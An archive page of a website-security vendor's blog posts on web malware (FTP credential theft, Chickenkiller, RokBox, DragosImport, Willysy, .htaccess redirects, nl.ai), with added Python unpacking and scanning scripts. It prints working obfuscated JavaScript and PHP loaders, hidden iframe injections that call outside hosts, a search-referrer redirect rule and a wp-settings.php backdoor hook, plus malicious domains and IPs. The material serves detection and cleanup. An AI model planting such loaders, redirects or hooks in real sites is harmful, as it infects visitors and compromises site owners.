Archive for the ‘News’ Category

Experts Explain: FTP Account Compromise

January 31st, 2012

This is the third part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

In this article, we will describe one of the most common reasons why benign websites are hacked and then infected with malware: FTP password compromise. This technique is neither sophisticated nor new; nonetheless, it is extremely effective.

It is estimated that nearly 30% of all websites injected with malicious computer code are compromised through stolen credentials, such as FTP passwords. We will delve into some detail about FTP, how to protect yourself and your website from this kind of attack, and alternative best-practice strategies.

What is FTP?
File Transfer Protocol (FTP) is a protocol that specifies how to communicate with a computer, such as a web server, in order to access the files on that computer. FTP is simply a set of rules according to which your computer can talk to a file server, web server or other computers and reliably exchange information.

This protocol, FTP, is based on another popular Internet protocol called Transmission Control Protocol (TCP). FTP follows a client-server model, wherein the computer that requests data is the client and the computer supplying the data is the server. Both client and server understand how to “talk” to each other reliably using FTP.

How is FTP used?
FTP can be used for a number of purposes, one of the primary uses being for webmasters to upload web pages to web servers. FTP in general can be used to easily move files from one computer to another. Academic institutions also use FTP to move large data files from experiments onto dedicated computers meant for storing information.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP, etc.).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website, (2) infect visitors to the compromised website, and more.

How do FTP credentials get compromised?
Credentials, such as FTP usernames and passwords, can be compromised by Trojans and viruses installed on the computers of unsuspecting users that “sniff” the credentials as they are transferred over the Internet to the web server. FTP transfers credentials and data in clear text. This means that any person or program “listening” in on the transmission of credentials to the FTP server can read them relatively easily and steal them.

There is extensive literature on rootkits, sniffing software, and key loggers on the Internet. A popular Trojan called ZBot was analyzed by Prevx and details were released in this forum entry. This particular Trojan is installed from a number of vectors: Rogue Antivirus advertisements, spam emails, fake codecs, and more. This Trojan is very effective at stealing FTP credentials and passing them to a “master” server that injects malware onto the associated websites.

How are the FTP credentials used to infect websites?
Once a Trojan like the one described above acquires FTP credentials, it passes the information to a master server called a “command and control” server. This command and control server could be present on an IRC chat channel, for example. Once the Trojan has stolen the credentials and automatically notified the master server via the chat channel, the master server uses the credentials to infect the website with malware.

How to detect if your site is vulnerable to FTP credential compromise attacks?
If you use FTP for access to files on your website, you need to be very careful. If you store your FTP usernames and passwords on your local computer using software like FileZilla, your website can be compromised if malicious software or a Trojan is installed on your computer. Never store credentials on your local computer.

Additionally, you should use SFTP (Secure FTP), SSH (Secure Shell), or SCP (Secure Copy), which use encryption, instead of FTP. Or use another method that encrypts credentials rather than sending them to your server in clear text when communicating with your web server. This will avoid credential compromise from “sniffing” attacks.

Conclusion
FTP credential compromise is a common vector for malicious hackers to exploit and infect websites. We have seen what FTP is, how it is exploited by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kinds of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

News, Report

Chickenkiller Infections

December 20th, 2011

Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

An example is present below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

This de-obfuscated code is easier to read:

function hDcd(data) {
    var b16_digits = "0123456789abcdef";
    var b16_map = new Array;
    for (var i = 0; i < 256; i++) {
        b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
    }
    if (!data.match(/^[a-f0-9]*$/i)) {
        return false;
    }
    if (data.length % 2) {
        data = "0" + data;
    }
    var ll = data.length;
    var result = new Array;
    var j = 0;
    for (var i = 0; i < ll; i += 2) {
        result[j++] = b16_map[data.substr(i, 2)];
    }
    return result.join("");
}

if (document.cookie.indexOf("cookieh=enabled") == -1) {
    document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
    document.cookie = "cookieh=enabled";
}
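
As an added example (not code from the post), the Python script below does the same unpacking statically, without running any JavaScript: it parses the p,a,c,k,e,d call, rebuilds the word table, decodes any hex literal the unpacked loader passes to document.write, and lists the iframe targets inside. The packed sample it runs on is constructed for this example and points at the reserved name example.invalid; the same wrapper appears in the RokBox and nl.ai posts further down the page.

```python
import re

# Constructed sample (not the sample from the post): a loader packed with the same Dean
# Edwards p,a,c,k,e,d scheme. Unpacked, it hex-decodes a payload and document.write()s it
# once per visitor, the shape of the Chickenkiller loader. The payload's iframe points at
# the reserved name example.invalid.
SAMPLE_HEX = ("3c696672616d65207372633d22687474703a2f2f6578616d706c652e696e76616c6964"
              "2f6d61696e2e706870223e3c2f696672616d653e")
PACKED_SAMPLE = (
    r'''eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))'''
    r'''+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))'''
    r'''{while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};'''
    r'''c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}'''
    r'''('3 4(5){6 7=[];8(6 i=0;i<5.9;i+=2){7.a(b.c(d(5.e(i,2),16)))}f 7.g("")}'''
    r'''h(j.k.l("m=n")==-1){j.o(4("''' + SAMPLE_HEX + r'''"));j.k="m=n"}',36,25,'|||function|hDcd'''
    r'''|data|var|result|for|length|push|String|fromCharCode|parseInt|substr|return|join|if|i'''
    r'''|document|cookie|indexOf|cookieh|enabled|write'.split('|'),0,{}))'''
)

_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "'": "'", '"': '"'}


def _read_js_single_quoted(src, pos):
    """Read the JS single-quoted string literal whose opening quote is at src[pos].
    Returns (value, index just past the closing quote); unknown escapes stay verbatim."""
    out, i = [], pos + 1
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src):
            out.append(_SIMPLE_ESCAPES.get(src[i + 1], "\\" + src[i + 1]))
            i += 2
        elif ch == "'":
            return "".join(out), i + 1
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated JavaScript string literal")


def parse_packed(script):
    """Pull (p, a, c, k) out of an eval(function(p,a,c,k,e,d){...}(p,a,c,k.split('|'),0,{})) call."""
    start = re.search(r"\}\('", script)          # end of the unpacker body, start of p
    if not start:
        raise ValueError("not a p,a,c,k,e,d packer call")
    p, i = _read_js_single_quoted(script, start.end() - 1)
    nums = re.match(r",\s*(\d+)\s*,\s*(\d+)\s*,\s*'", script[i:])
    if not nums:
        raise ValueError("unexpected packer arguments after p")
    a, c = int(nums.group(1)), int(nums.group(2))
    k_text, i = _read_js_single_quoted(script, i + nums.end() - 1)
    if not script.startswith(".split('|')", i):
        raise ValueError("dictionary is not split on '|'")
    return p, a, c, k_text.split("|")


def encode_index(c, a):
    """The packer's e(c): the short token standing in for dictionary entry c in radix a."""
    prefix = "" if c < a else encode_index(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[c])


def unpack(script):
    """Statically unpack one packed script: every word token that names a non-empty
    dictionary entry is replaced by that entry, without evaluating any JavaScript."""
    p, a, c, k = parse_packed(script)
    words = {encode_index(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    return re.sub(r"\b\w+\b", lambda m: words.get(m.group(0), m.group(0)), p, flags=re.ASCII)


def decode_hex_payload(hex_text):
    """Mirror of the loader's hDcd(): odd-length input is left-padded with one '0'."""
    if len(hex_text) % 2:
        hex_text = "0" + hex_text
    return bytes.fromhex(hex_text).decode("latin-1")


def hidden_iframe_targets(script):
    """Unpack, decode every quoted hex literal in the result, and list iframe src values."""
    source = unpack(script)
    targets = []
    for hex_text in re.findall(r'["\']([0-9a-fA-F]{16,})["\']', source):
        html = decode_hex_payload(hex_text)
        targets += re.findall(r'<iframe[^>]*\bsrc=["\']?([^"\'\s>]+)', html, flags=re.I)
    return targets


if __name__ == "__main__":
    print(unpack(PACKED_SAMPLE))
    print("iframe targets:", hidden_iframe_targets(PACKED_SAMPLE))
```

Feed a packed sample lifted from an infected page to hidden_iframe_targets() to see where the hidden iframe points before deciding what to clean; the unpacked source is also what the signature strings in the later posts should be matched against.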

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

These links all resolve back to a single IP address. As you can see, the IP address and host were created with malicious intent. It is an example of a site that has been deployed specifically to spread malware.

IP address: 77.232.70.33
Hostname: bl4ckh4x0rs.com

The malware has infected many sites including those below.

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

RokBox.js Infections

December 8th, 2011

Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63” all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is good practice to change all your access passwords as well to ensure your security.

How should I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

DragosImport, Domboware Attacks

December 5th, 2011

In recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign sites compromised by malicious hackers. We will discuss the details of these distribution sites in this post.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

Willysy Injection Attacks

December 1st, 2011

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack results in malicious hackers injecting malicious Iframes into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages of your own website. Think of it as a shipping container that fits like a Lego block on your ship: the container can hold cargo from a source you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

These exploits are used to infect benign, legitimate sites. Once the malware is injected into these exploited sites, their visitors are infected through various mechanisms used to install the malware on the visitor's machine. Some of these mechanisms involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indicator of infection is accesses from the IP addresses below in your server log files. If you do find these IP addresses in your logs, pay special attention to determining whether your site has been compromised.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The list below includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware distribution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

Redirection Attacks

November 23rd, 2011

Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.

About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.

Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.

Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.

aquarigger
911docs
thefreeadforum
hqa-traffic
twilightparadox
googlexstat
pomorze
lixstats
legenica

How do I identify the malicious code?
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.

This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.

<ifmodule>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
</ifmodule>
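
As an added example (not code from the post), the Python check below reads a whole .htaccess file, so the blank-line padding the post warns about cannot hide anything, and reports every RewriteRule whose target is an off-site URL; a rule guarded by HTTP_REFERER conditions, the search-engine pattern shown above, is rated high. The sample file and the SITE_HOSTS set are assumptions constructed for this example.

```python
from urllib.parse import urlsplit

# Constructed sample (not the file from the post): a benign rule at the top, a run of
# blank lines of the kind the post describes, then a referrer-conditioned redirect to
# an off-site host. The redirect target uses the reserved name example.invalid.
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^old-page$ /new-page [R=301,L]\n"
    + "\n" * 40 +                        # padding meant to push the payload off-screen
    "<IfModule mod_rewrite.c>\n"
    "RewriteEngine On\n"
    "RewriteOptions inherit\n"
    "RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]\n"
    "RewriteRule .* http://redirect.example.invalid/in.php [R,L]\n"
    "</IfModule>\n"
)

# Assumed: the hostnames this site legitimately redirects to; any other host is off-site.
SITE_HOSTS = {"example.org", "www.example.org"}


def find_offsite_redirects(htaccess_text, site_hosts=SITE_HOSTS):
    """Return one finding per RewriteRule whose target is an off-site URL.

    Severity is "high" when the rule is guarded by HTTP_REFERER conditions (the
    search-engine cloaking pattern in the post) and "review" otherwise. Every line is
    read, so blank-line padding does not hide a rule; the longest blank run seen before
    the rule is reported as a hint that padding was used."""
    findings = []
    pending_conds = []          # RewriteCond lines that apply to the next RewriteRule
    blank_run = longest_blank_run = 0
    for lineno, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            blank_run += 1
            continue
        longest_blank_run = max(longest_blank_run, blank_run)
        blank_run = 0
        if line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending_conds.append((parts[1], parts[2]))
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            host = urlsplit(target).hostname      # None for relative targets like /new-page
            referrers = [pat for var, pat in pending_conds if "HTTP_REFERER" in var.upper()]
            pending_conds = []
            if host and host.lower() not in site_hosts:
                findings.append({
                    "line": lineno,
                    "target": target,
                    "referrers": referrers,
                    "severity": "high" if referrers else "review",
                    "blank_run_before": longest_blank_run,
                })
        # other directives (RewriteEngine, <IfModule>, ...) leave pending_conds untouched
    return findings


if __name__ == "__main__":
    for finding in find_offsite_redirects(SAMPLE_HTACCESS):
        print(finding)
```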

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security

Google Groups Hacked?

November 22nd, 2011

As of November 21, 2011, a large number of posts on Google Groups appear to have been replicated into some adult chat rooms on Google Groups. This seems to be an attempt to game Google's search ranking algorithm and gain high search rankings for adult, spammy and potentially malicious websites.

We have blogged previously about how malicious hackers misuse SEO mechanisms to direct traffic to their malicious websites:

More discussion about this issue is taking place on Google Groups. We will present more details about this incident as we know them.

News, Report, Security

nl.ai p,a,c,k,e,d Malware

November 7th, 2011

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below will appear near the top of the page source. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

  1. Access your hosting account via SSH or SFTP.
  2. Remove the malware inserted into the file “wp_inc/upd.php”, located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers!)
  3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory:

function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . '/wp_inc')){
        readfile($t_d . '/wp_inc');
    }
}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );
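
As an added example (not code from the posts), the Python scanner below walks a site directory and reports a file only when it contains every string of an indicator set, which is the “all in the same file” check the RokBox post asks for. The sets are taken from the RokBox, DragosImport/Domboware, Willysy, Chickenkiller and nl.ai posts on this page; the sample tree it builds is constructed for this example, and the packed-JavaScript entry is listed for review only because the benign RokBox file is packed with the same wrapper.

```python
import os
import tempfile

# Indicator sets taken from the posts on this page. A file is reported only when it
# contains every string of a set. The packed-JavaScript wrapper is listed for review:
# the benign RokBox file is packed with the same wrapper, so it is not proof of infection.
RULES = {
    "RokBox _0xdc8d loader": ["_0xdc8d", "refurl", "\\x63"],
    "Willysy hidden iframe": ["willysy.com/images/banners/"],
    "Willysy companion script": ["exero.eu/catalog/jquery.js"],
    "DragosImport script tag": ["dragosimport.com/js/"],
    "Domboware script tag": ["domboware.hu/js/"],
    "nl.ai wp-settings.php hook": ["check_wordpress", "sys_get_temp_dir", "/wp_inc"],
    "Chickenkiller cookie gate": ["hDcd", "cookieh=enabled"],
    "REVIEW: packed JavaScript wrapper": ["eval(function(p,a,c,k,e,d)"],
}


def match_rules(text, rules=RULES):
    """Names of every rule set whose indicator strings all occur in text."""
    return [name for name, needles in rules.items() if all(n in text for n in needles)]


def scan_tree(root, rules=RULES, max_bytes=5_000_000):
    """Walk root and return {relative path: [matched rule names]} for matching files.
    Files are decoded as latin-1 so binary content never raises; the indicators are ASCII."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "rb") as fh:
                    text = fh.read().decode("latin-1")
            except OSError:
                continue
            names = match_rules(text, rules)
            if names:
                hits[os.path.relpath(path, root)] = names
    return hits


def write_sample_tree():
    """Constructed sample site (not real infected files): three files carrying one
    indicator set each plus one clean file. Returns the temporary directory path."""
    root = tempfile.mkdtemp(prefix="sth_scan_")
    samples = {
        "modules/rokbox/rokbox.js":
            'var _0xdc8d=["\\x73\\x63\\x5F"];refurl=escape(document[_0xdc8d[7]]);',
        "wp-settings.php":
            "<?php\nfunction check_wordpress(){\n$t_d = sys_get_temp_dir();\n"
            "if(file_exists($t_d . '/wp_inc')){ readfile($t_d . '/wp_inc'); }\n}\n"
            "add_action('wp_head', 'check_wordpress');\n",
        "index.html":
            "<html><body><p>shop</p><iframe src='hxxp://willysy.com/images/banners/' "
            "style='position:absolute;visibility:hidden'></iframe></body></html>\n",
        "index.php": "<?php echo 'clean file'; ?>\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel_path, names in sorted(scan_tree(write_sample_tree()).items()):
        print(rel_path, "->", ", ".join(names))
```

Point scan_tree() at the document root of a real site to get the same report; anything under the review rule needs a look at the unpacked source rather than automatic removal.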

What does the malware do?
